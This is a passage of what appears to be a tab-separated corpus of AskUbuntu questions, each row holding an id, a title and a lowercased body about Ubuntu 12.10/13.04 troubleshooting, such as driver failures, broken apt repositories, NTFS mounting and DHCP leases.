0/ 0 ? ? % ? ? % ? ? , ? % 0 0 movie-aspect is 1.33:1 - prescaling to correct movie aspect . vo : [ xv ] 720x576 = > 768x576 planar yv12 a : 44.1 v : 44.1 a-v : 0.001 ct : 0.000 0/ 0 3 % 3 % 0.5 % 0 0 exiting ... ( quit )
285543	how do i install and configure a security card ( cac ) reader for ubuntu 13.04	i need to be able to access websites that require the use of a security card and reader . ( i.e miliary id ) i 've successfully setup my ubuntu 13.04 pc to do so and wanted to share the steps here . the card reader used is a scr3310 . it works with no additional set up . if you are using a different card reader you may need to install additional drivers .
285552	kernel panic after upgrade to ubuntu 13.04	a few hours ago i upgraded my ubuntu version to 13.04 ( from 12.10 ) . since then , in about 2-3 hours i have 2-3 times kernel panic-not syncing . does anybody has the same issue ? how can i resolve this ? i am on a laptop dell inspiron . thanks !
285553	upgrading to ringtail 13.04 broke some apt repositories ?	when i run sudo apt-get update on ringtail , i get this : err http : //overviewer.org debian/./ amd64 packages 404 not found [ ip : 208.69.124.224 80 ] and err http : //overviewer.org debian/./ i386 packages 404 not found [ ip : 208.69.124.224 80 ] i went on the overviewer channel on freenode and asked them about the repository , and they checked and say there 's nothing wrong with their end , so i uninstalled overviewer on my 12.10-powered laptop , and tried again and it works fine there . overviewer irc snipet : [ 08:54 ] < achin > on our server , i can see the file debian/packages , but not debian/binary-amd64/packages [ 08:54 ] < achin > i suspect that something might have changed in ringtail ? here 's the ( condensed ) contents of my sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # deb cdrom : [ lubuntu 13.04 _raring ringtail_ - alpha amd64 ( 20130403 ) ] / raring main multiverse restricted universe # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130420 ) ] / raring main restricted # # added by seann 27 dec 2012 - minecraft map overviewer deb http : //overviewer.org/ debian ./ the instructions on overviewer.org are as follows : overviewer.org apt repository this is the overviewer.org apt repository , which hosts frequent builds of minecraft overviewer for use on debian-based systems , such as ubuntu or debian itself . in order to use this repository , add the following line to your /etc/apt/sources.list : deb http : //overviewer.org/debian ./ then , run apt-get update as root to update your repository information . installing overviewer is as simple as running apt-get install minecraft-overviewer . since this repository is updated at the same time as the windows builds on github , you can also upgrade through apt . to upgrade , run apt-get update , then apt-get install minecraft-overviewer again . and i 've done all that , as you can see from my sources.list ... so ... what changed between 12.10 and 13.04 , and how do i fix it ? it 's not a really big deal because i was able to download and manually install the update , but it 's annoying to say the least .
285555	can not write to a newly installed hard drive	i 've installed ubuntu 12.10 . my computer has 2 hard drives . the os is on one and i want to use the second for movies and music . i formatted the the second drive ( dev/sdc1 ) as ext4 with the label media1 . i can not create a folder on the media1 drive . i also want all users to have read , write , and execute permissions . i have two users set up : media server zam plex plexserv zam @ mediaserver i am assuming i need to use terminal and hope i have given enough information to have someone tell me what to type .
285556	google chrome black screen tearing	when i open omgubuntu site ( or some other page ) , i get screen tearing http : //ubuntuone.com/53v8xojexiu1edqs87rvz8 also sometimes videos does n't work . sometimes i can watch just fullscreen , sometimes just not fullscreen . how do i fix all that ? i 'm using : ubuntu 13.04 google chrome 26.0.1410.63 nvidia 304.88-0ubuntu2 drivers
285558	not executing programs ( *.sh ) with double click in 13.04	i use ubuntu to host many servers , some minecraft , some cloud services , and many websites . unfortunately , after upgrading to ubuntu 13.04 , it will not launch the craftbukkit.sh even though it is set to allow it to execute , it only opens in getit . i am about to loose it since its been down for 3 hours and person after person comes to me with questions on why its all down . i am getting annoyed . i am running xampp 1.7.7 ( not 1.8.1 for various reasons ) on my server as well , after it says its loaded , it is not . connecting to localhost does nothing . can anyone help by chance ? thanks !
285559	how to reenable alternating grey lines in nautilus/files 3.6+ list view ?	i 've recently upgraded from precise to raring and noticed that nautilus 3.6 , when displaying files and folders in list mode , no longer has alternating grey lines ( there 's probably a better name for these , but i do n't know it ; see pictures below ) . this used to be the default , and helped me to easily distinguish between particular files and their attributes . is there a way to reenable this ? is it maybe theme dependent ? the old list view with clearly demarcated lines : the new , unclear list view :
285560	can i set the mtu to be 9000 for everything on my network except the internet router ?	i need to set the mtu to 9000 for my network devices , except for the bt home hub which is limited and can not be configured . 9000 means i get 50mb/s instead of 11mb/s between the server and the nas . but it means that certain sites fail when browsing the internet . is it possible to set the machine to speak 9000 to everything except the router ?
285562	command `` apt-get-repository '' does n't work on ubuntu 12.04	i 'm trying to install libreoffice 4.0 on ubuntu 12.04 . i try to begin with add the repository . sudo add-apt-repository ppa : libreoffice/libreoffice-4-0 i get this output : sudo : apt-get-repository : command not found tested to run sudo apt-get install software-properties-common python-software-properties output : reading package lists ... done building dependency tree reading state information ... done python-software-properties is already the newest version . software-properties-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
285563	/sda , hard drives , usb drives , all missing	after updating , my system does n't detect any partitions or usb drives save for the two partitions i use as / and /home . /dev/sda does n't even exist . i 'm not sure if that 's normal because i have n't checked in a while but it seems strange to me . any ideas ?
285566	hdmi sound without overscan on open-source drivers ?	is there a way to have a regular scanned display with audio via an hdmi connection on open-source drivers ? possibly a way to force dvi video output over hdmi instead of 1080p ? machine : dell studio laptop w/ radeon mobility hd3450 graphics , open-source drivers , i have tried this on both 12.04 and 12.10 . tv/monitor connected via hdmi . fglrx drivers do not work for me ( log in and only background shows up , yes i updated the kernals ) i can turn underscan on and off in xrandr ( which leaves me with either a zoomed out or in desktop ) . i have a cheap little tv with no overscan/underscan menu options . situation 1 : hdmi sound is disabled by default . result 1 : info button on remote displays `` dvi - 1920x1080 @ 60hz '' , image is perfect situation 2 : hdmi sound is enabled via editing the grub . grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' result 2 : info button on remote displays `` hdmi - 1080p '' , audio works , but display is overscan . as stated in the title , the fglrx drivers do not work . p.s . i have searched a lot , and have tried a few different fixes , however it is still very possible i missed something or made an error . also , 99 % of my linux experience is ubuntu , but i am still relatively new to ubuntu and actually needing to use a command prompt/terminal to do things in an os ( i have taken university level coding classes before though ) . also , i know this question has been asked for amd/ati and received some answers , but none of the questions seem to address the overscan issue on open-source with an actual answer .
285567	ca n't modify intel wireless settings due to `` fatal : module iwlagn not found . '' error	i upgraded my machine to 13.04 this morning , and now it wo n't connect to my wifi . here 's the history : i installed ubuntu on my windows machine using wubi back in version 11.10 . the wifi did n't work then , either , but there was a little hack to fix it : modprobe -r iwlagn modprobe iwlagn bt_coex_active=0 and since then i just ran that at every startup , and the wifi would connect without any issue . now when i run it , i get this message : fatal : module iwlagn not found . fatal : module iwlagn not found . anyone know what i need to do to fix this ?
285568	why is my desktop background black after upgrade to 13.04 ?	after i upgraded to 13.04 my desktop background has been a black screen , i.e . : edits : ubuntu tweak does n't seem to be able to change the window theme either ( although all other themes like icon themes are all easily modifiable ) . tweak tool can change the window theme , however . i have tried the following : changing desktop backgrounds ( including back to default ) rebooting running the commands in terminal : ( which were obtained from the answer to the question , unity does not start in ubuntu 13.04 ) dconf reset -f /org/compiz/ & & unity -- reset-icons & disown and then rebooting ( which just changed the colour and size of the unity launcher ) what is laid out here http : //falkvinge.net/2013/02/15/how-to-install-nvidia-drivers-in-ubuntu-12-10-quantal/ . dconf reset -f /org/compiz/ & & gnome-session-quit in terminal unity -- reset ( which gave the output : error : the reset option is now deprecated ) unity -- replace what 's outlined here : http : //askubuntu.com/a/286774/93125
285569	not recognizing touchpad , usb , wifi , or ethernet on 13.04	had 12.10 before and things were fine . i am using a dell vostro 3550 laptop . all devices work fine from the live usb drive . but after i actually do the install onto my drive , my touchpad , usb ports , wifi and ethernet are not working . i am dual booting with win7 , have tried upgrades , full reinstalls , recreating the linux partitions . nothing works . anything i can try ?
285571	ubuntu 13.04. fail to start after installing nvidia drivers ( vostro laptop )	everything worked fine in 13.04 ubuntu but then i installed nvidia-drivers-103 now it does not load into login screen at all . i see blank purple screen during start-up and then just blank black screen appears and nothing happens after . i booted into recovery mode and removed nvidia drivers , that did not helped . i noticed i had broken unity environment in recovery mode ( no launcher or toolbars , just wallpaper ) so i followed : unity does n't load , no launcher , no dash appears where i reseted my unity/compiz back but this did not helped me to boot so finally i installem gdm and now i have compiz and unity fully removed and nvidia drivers too . i still can not boot , only recovery mode works fine . what i should try next to have unity and compiz happily working ? which logs should i check and what could be wrong ? i would expected that unity/compiz is problem but as i still can not start my os i guess the reason is much more deeper than i expected . how to restore original version of graphics drivers ? obviously just removing nvidia drivers did not restored original configuration . hw : laptop vostro 3750 , nvidia gt 525m , intel mobile hm67 chipset
285572	can not remove landscape-common or dist-upgrade	doing : dpkg -- purge `` landscape-common '' ( reading database ... 125316 files and directories currently installed . ) removing landscape-common ... file `` /usr/bin/pyclean '' , line 64 except ( ioerror , oserror ) , e : ^ syntaxerror : invalid syntax dpkg : error processing landscape-common ( -- purge ) : subprocess installed pre-removal script returned error exit status 1 traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : landscape-common or apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up landscape-common ( 12.05-0ubuntu2 ) ... traceback ( most recent call last ) : file `` /usr/bin/pycompile '' , line 36 , in < module > from debpython.version import supported , debsorted , vrepr , \ file `` /usr/share/python/debpython/version.py '' , line 24 , in < module > from configparser import safeconfigparser importerror : no module named configparser dpkg : error processing landscape-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : landscape-common e : sub-process /usr/bin/dpkg returned an error code ( 1 ) or do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1,206 kb ] fetched 1,206 kb in 0s ( 0 b/s ) authenticate 'raring.tar.gz ' against 'raring.tar.gz.gpg' extracting 'raring.tar.gz' file '' /tmp/ubuntu-release-upgrader-nq83uj/distupgrade/distupgradecontroller.py '' , line 1629 , in fullupgrade if not self.prepare ( ) : file '' /tmp/ubuntu-release-upgrader-nq83uj/distupgrade/distupgradecontroller.py '' , line 441 , in prepare self._sshmagic ( ) file '' /tmp/ubuntu-release-upgrader-nq83uj/distupgrade/distupgradecontroller.py '' , line 311 , in _sshmagic '' do you want to continue ? '' ) % port ) file '' /tmp/ubuntu-release-upgrader-nq83uj/distupgrade/distupgradeviewtext.py '' , line 216 , in askyesnoquestion res = sys.stdin.readline ( ) .decode ( encoding , `` backslashreplace '' ) attributeerror : 'str ' object has no attribute 'decode' === command detached from window ( fri apr 26 00:06:19 2013 ) === === command terminated with exit status 1 ( fri apr 26 00:06:19 2013 ) === did n't succeed ? any ideas ?
285573	how do i install the correct video drivers in a new install on a macbook pro 8.2 15 '' ?	i have a macbook pro 8.2 15 '' ( early 2011 ) and i have an issue installing ubuntu . i have tried installing ubuntu 12.04 , 12.10 and 13.04 . i have the same problems with all versions . i have tried both dvd install and usb install . i freed 60gb from my hard drive for ubuntu and proceeded to install . i can boot to the normal screen where i can choose to try ubuntu or install . when i choose install , i end up with frozen black screen . i tried installing with `` nomodeset '' command . at first i see something happening in text form but it still freezes soon . then somehow i figured out the issue might be my graphics card ( this mac has ati radeon 6490m and integrated intel hd graphics 3000 ) . i booted again with `` radeon.modeset=0 '' . now i 'm able to the very end of the installation procedure , but after rebooting i it gives me a window which says `` the system is running in low graphics mode '' and sends me to the command line . i checked the error logs and it says something like `` screens found but none have usable configuration '' and some fatal error afterwards `` no screens found '' so the problem is nasty . if i try to install with only `` nomodeset '' i wo n't get too far with the install , and when i install with `` radeon.modeset=0 '' i get to install the whole thing but evidently its not working : d. after installing with `` radeon.modeset=0 '' i even installed lynx and downloaded latest drivers from ati web page and installed them in command line , but it was n't much of help . please help me , i have been fighting with this about 14 hours now ...
285574	ubuntu 13.04 shutdown hangs in asus a3500e	on reboot or shutdown , in a old asus a3500e notebook , with a fresh ubuntu 13.04 install , the process hangs and shows the messages : '' acpid : exiting '' '' speech-dispatcher disabled ; edit /etc/default/speech-dispatcher '' i do n't know if the message is something that has just been finished correctly , or is the reason for the shutdown stop ... no proprietary drivers are suggested in ubuntu sw center . no more updates of ubuntu are in list . forcing shutdown with power button , the screen gets black , but power light maintains on . the only way is to remove battery ... any ideas ?
285577	unable to mount windows partition	i ca n't mount the windows 8 partition . i have shut it down properly . when i try to open up in devices , it gives me the following error : unable to mount 413 gb filesystem error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda3 /media/f866cf6f66cf2ce6 when i try the suggested command , i get : $ logfile version 2.0 is not supported . ( this driver supports version 1.1 only . ) $ logfile version 2.0 is not supported . ( this driver supports version 1.1 only . ) did not find any restart pages in $ logfile and it was not empty . the file system was n't safely closed on windows . fixing . fuse : failed to access mountpoint /media/f866cf6f66cf2ce6 : no such file or directory here is the output of blkid : /dev/sda1 : label= '' recovery '' uuid= '' 9aa42216a421f603 '' type= '' ntfs '' /dev/sda2 : label= '' system reserved '' uuid= '' 8e76cda076cd8a03 '' type= '' ntfs '' /dev/sda3 : uuid= '' f866cf6f66cf2ce6 '' type= '' ntfs '' /dev/sda5 : uuid= '' a30b4dc5-5f9a-42fb-b0da-33d932472fa3 '' type= '' ext4 '' /dev/sda6 : uuid= '' 908d3819-a350-4a62-bd00-f7a2c3d494cb '' type= '' swap '' /dev/sr0 : label= '' tablet_cd '' type= '' iso9660 '' /dev/mmcblk0p1 : label= '' nikon d90 '' uuid= '' 6265-3236 '' type= '' vfat ''
285578	problem with opened windows	after upgrading ubuntu from 12.10 to 13.04 all windows , which i open just hopping up and down throught customs screen . how can i fix it ?
285580	database create in mysql database	i am using ubuntu 12.10 and recently i install xampp 1.8.1 . my problem i can not create new database using both sql command and phpmyadmin . in phpmyadmin database creation input box is not shown and sql command is not works . here i use sql command as create database my_db but i can easily create table and run other sql command as like windows . how can i solve this problem .
285583	how do i enable the user dynamic wallpaper in the login screen of ubuntu 13.04 ?	ubuntu 12.04 unity greeter had introduced the selected user dynamic wallpaper which allowed , when selecting a user from the available users list in the login screen , the wallpaper to change to reflect the selected user 's desktop wallpaper . apparently that feature has been disabled by default since ubuntu 12.10 . how do i enable that feature in ubuntu 13.04 ?
285585	v12.10 ca n't apt-get update	i know there are lots of questions posed about this , but after troubleshooting for several hours , i 'm not sure what to do anymore ... i first installed ubuntu 12.10 and had no internet access at all . it was running on vmware player with a windows 7 host . i was instructed to go into firefox > edit > preferences > advanced and under the network > settings , i selected `` auto-detect proxy settings for this network '' and under encryption > view certificates i imported 2 .crt files and a .cer file and selected `` trust this ca to identify websites '' and `` trust this ca to identify software makers '' , and that allowed firefox to successfully access the internet . that worked , but when i use sudo apt-get update it pauses for a before reporting zackshef @ ubuntu : ~ $ sudo apt-get update err http : //extras.ubuntu.com quantal inrelease err http : //extras.ubuntu.com quantal release.gpg unable to connect to extras.ubuntu.com : http : err http : //us.archive.ubuntu.com quantal inrelease err http : //us.archive.ubuntu.com quantal-updates inrelease err http : //us.archive.ubuntu.com quantal-backports inrelease err http : //us.archive.ubuntu.com quantal release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] err http : //us.archive.ubuntu.com quantal-updates release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] err http : //us.archive.ubuntu.com quantal-backports release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] 0 % [ connecting to security.ubuntu.com ( 91.189.92.184 ) ] . . . reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to extras.ubuntu.com : http : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to us.archive.ubuntu.com : http : [ ip : 91.189.91.15 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to security.ubuntu.com : http : [ ip : 91.189.92.190 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . so i tried a few other things ( that i ca n't post because they contain links and i apparently do n't have enough reputation to post more that 2 links ... ) i pinged the archive ... this went on for several minutes until it reached icmp_seq_479 ( or some number in the 400 's ) , i aborted it , and it said there was 100 % packet loss ... it 's very frustrating . please let me know what other information you need to help me get things working . thank you ! zack
285586	why ubuntu 13.04 does n't recognize my external hdd ?	i just installed ubuntu 13.04 , a clean installation , and everything seems to be running ok , at least in the last 2 hours that i have tried except for one thing ... when i tried to restore my data from the backup i made with deja dăşp in 12.10 , i realized that ubuntu does n't recognize my external hdd , not even gparted . the light indicator just keeps blinking forever and gparted never finishes to recognize the devices . i tried to connect the disk to a pc with ubuntu 12.10 and there everything is ok ; i can see all my partitions and my data , so its not my hdd . i tried the command fdisk -l but it just shows me my internal sdd . the weirdest thing is that it recognizes perfectly my usb memories ; does anyone have an idea about what is going on ? my pc is a toshiba satellite l645d . if you need more info please tell me . thanks for the help !
285588	is there a way to restore nautilus ' split screen ( f3 ) feature ?	i am using ubuntu 13.04 since today and i am missing the split screen function in nautilus . is there any way to patch nautilus so that this amazing function is usable again ?
285590	ca n't boot into ubuntu 13.04	today i installed ubuntu 13.04 by doing clean install but i could only see purple screen . then i installed nvidia drivers using root , now i can see only background image and unity is not loading . i think compiz is not loading too since i have no window borders . how to fix this . edit : i ran nvidia-xconfig and got error : `` unable to write to directory /etc/x11 '' . also i ran unity -- replace and got error : ca n't launch opengl ( something like that ) edit : downloaded image using torrent and then reinstalled ubuntu , now it works , also during installation i checked option for downloading updated during installation .
285594	what graphics card do i have in this hp pavilion g6 ?	i 've just typed lspci | grep vga in the terminal and it came up with this : 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati beavercreek [ radeon hd 6620g ] 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m/7400m series ] it 's an hp pavilion g6 with dual graphics . the 6620g is the amd a8 cpu , but what is the 6400m/7400m ? i 've run the ati catalyst and it 's only finding the 6620g . any help would be great . cheers .
285595	how can i alter the next/previous tab shortcut in terminal ?	i want to change the next tab shortcut in terminal to be ctrl+tab . i tried using the gconf-editor as suggested here but nothing happens when i run that using alt+f2 . my googling for other solutions has failed . suggestions ?
285596	can i get my laptop fn-keys to work in ubuntu ?	i have a samsung series 5 laptop , model np535u3c-a01se . i recently decided to try ubuntu and installed 12.04 lts . one thing that bothers me is that my function keys do n't work properly . i read on a blog that i could install windows drivers using ndiswrapper , then i noticed that the fn-keys need windows software to work , not drivers . i then stumbled across this question , samsung new series 9 , not all function keys working . explains how to get brightness keys to work . seems like he could n't get all fn-keys to work though . any ideas ? ( i 'm new to linux btw , not familiar with commands )
285605	how to fix broken packages ?	how do i fix broken packages when it is not working ? when i try to fix broken packages , it tells me to `` fix broken packages . ''
285607	getting errors with ubuntu gnome 13.04 after upgrading to gnome 3.8	i 've installed today the final version of ubuntu gnome 13.04 ( fresh install , no upgrades ) , and right after i added the gnome ppa and updated it to gnome 3.8 , i 'm getting errors . software center gives an error right after it 's open , an then closes , system monitor gives a error message to , but do n't close . i do n't know if there are other programs with problems , because i 've not tested the system thoroughly . i updated gnome this way : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade running software center from terminal gives this error : software-center 2013-04-25 19:35:22,619 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-04-25 19:35:23,506 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.dbus.error.serviceunknown : the name org.freedesktop.geoclue.master was not provided by any .service files' 2013-04-25 19:35:23,860 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-04-25 19:35:23,863 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-04-25 19:35:23,874 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-04-25 19:35:23,873 - root - error - could not find any typelib for launchpadintegration 2013-04-25 19:35:23,932 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) ( software-center:2793 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 2104 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( imagem do năşcleo gravada ) and running system monitor from terminal gives this error : gnome-system-monitor ( gnome-system-monitor:2909 ) : warning ** : selinux was found but is not enabled so , my question is : how can i install ubuntu gnome 13.04 and update it to gnome 3.8 , without breaking something ( if that is possible ) ?
285609	how to install amd ati radeon graphics hd 6770m	please help me install my amd ati radeon graphics hd 6770m on ubuntu 13.04 64bit . i have hybrid graphic card : amd ati radeon graphics hd 6770m + intel hd graphics 3000 my laptop model : hp pavilion dv6 6050ee hardware is listed as supported here : http : //wiki.cchtml.com/index.php/hardware the laptop fan is always running .
285611	weird issue with bootstrap icons on html pages	i 'm on top of ubuntu 13.04 , and when firefox ( and/or chrome ) renders a bootstrap icon , the result is the one i show on the screenshot . click to open a full-resolution image . i do n't find any info about this issue , anyone has a clue about what 's happening ?
285618	unistalling kubuntu	a while ago , i installed kubuntu because i heard rumors that it ran faster than ubuntu . well , i found that to not be true on my machine . since i got kubuntu from the terminal , is there a way to uninstall it , without uninstalling ubuntu ? thanks ! ! !
285621	how to configure dhcp ?	i have still problems with internet connection on my network using ubuntu 12.10 . i have router netgear 192.168.1.1 , then tp-link running on his 192.168.1.2 and ubuntu connected through wire to tp-link with 192.168.0.200 . it runs ok , but sometimes ip is not renewed and i loose internet . i am coming over it by plug out and in wire up to the point that i have 192.168.1.3 or 192.168.0.200 ip and then kill-9 and restarting dhcpcd eth0 . i cant figure out from where goes this 192.168.1.3 address which i think is source of my problems . i see this in my dhcp liases file : lease { interface `` eth0 '' ; fixed-address 192.168.1.3 ; option subnet-mask 255.255.255.0 ; option dhcp-lease-time 86400 ; option routers 192.168.1.1 ; option dhcp-message-type 5 ; option dhcp-server-identifier 192.168.1.1 ; option domain-name-servers 192.168.1.1 ; option domain-name `` chello.pl '' ; renew 4 2013/04/25 09:52:47 ; rebind 4 2013/04/25 20:26:26 ; expire 4 2013/04/25 23:26:26 ; } lease { interface `` eth0 '' ; fixed-address 192.168.0.200 ; option subnet-mask 255.255.255.0 ; option dhcp-lease-time 7200 ; option routers 192.168.0.1 ; option dhcp-message-type 5 ; option dhcp-server-identifier 192.168.0.1 ; option domain-name-servers 192.168.0.1 ; renew 4 2013/04/25 21:17:52 ; rebind 4 2013/04/25 22:11:32 ; expire 4 2013/04/25 22:26:32 ; } lease { interface `` eth0 '' ; fixed-address 192.168.1.3 ; option subnet-mask 255.255.255.0 ; option routers 192.168.1.1 ; option dhcp-lease-time 86400 ; option dhcp-message-type 5 ; option domain-name-servers 192.168.1.1 ; option dhcp-server-identifier 192.168.1.1 ; option domain-name `` chello.pl '' ; renew 5 2013/04/26 07:27:14 ; rebind 5 2013/04/26 17:28:47 ; expire 5 2013/04/26 20:28:47 ; } what even more strange to me : ifconfig says i am running my desirable 192.160.0.200 but gui ( active connections ) says i have 192.168.1.3 : eth0 link encap : ethernet hwaddr d4:3d:7e:4b:47 : dc inet addr:192.168.0.200 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :d63d:7eff : fe4b:47dc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10496363 errors:0 dropped:0 overruns:0 frame:0 tx packets:9349273 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5312676815 ( 5.3 gb ) tx bytes:781747139 ( 781.7 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:178598 errors:0 dropped:0 overruns:0 frame:0 tx packets:178598 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:41179188 ( 41.1 mb ) tx bytes:41179188 ( 41.1 mb ) gui : dhcp eth0.info : ipaddr='192.168.0.200' netmask='255.255.255.0' network='192.168.0.0' broadcast='192.168.0.255' routes= '' gateways='192.168.0.1' dnsservers='192.168.0.1' dhcpsid='192.168.0.1' leasedfrom='1366928965' leasetime='7200' renewaltime='3600' rebindtime='6300' interface='eth0' classid='dhcpcd 3.2.3' clientid='ff:65:74:68:30:00:01:00:01:18 : ab : f5 : fd : d4:3d:7e:4b:47 : dc' dhcpchaddr='d4:3d:7e:4b:47 : dc' # dhcpcd-1.x and 2.x compatible variables dns='192.168.0.1' gateway='192.168.0.1' please tell what more is needed if something . maybe this is related to fact that it tries to use ipv6 ? i get this idea from syslog : apr 26 01:43:58 myhost avahi-daemon [ 904 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :d63d:7eff : fe4b:47dc . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : interface eth0.ipv6 no longer relevant for mdns . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : withdrawing address record for 192.160.0.200 on eth0 . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : leaving mdns multicast group on interface eth0.ipv4 with address 192.160.0.200 . apr 26 01:43:58 myhost avahi-daemon [ 904 ] : interface eth0.ipv4 no longer relevant for mdns . apr 26 01:43:58 myhost networkmanager [ 899 ] : < warn > dns : plugin dnsmasq update failed apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( ( null ) ) : removing resolv.conf from /sbin/resolvconf apr 26 01:43:58 myhost dnsmasq [ 2395 ] : setting upstream servers from dbus apr 26 01:43:58 myhost dbus [ 876 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > dhclient started with pid 11708 apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) beginning ip6 addrconf . apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . apr 26 01:43:58 myhost dbus [ 876 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 26 01:43:58 myhost dhclient : internet systems consortium dhcp client 4.2.4 apr 26 01:43:58 myhost dhclient : copyright 2004-2012 internet systems consortium . apr 26 01:43:58 myhost dhclient : all rights reserved . apr 26 01:43:58 myhost dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 26 01:43:58 myhost dhclient : apr 26 01:43:58 myhost networkmanager [ 899 ] : < info > ( 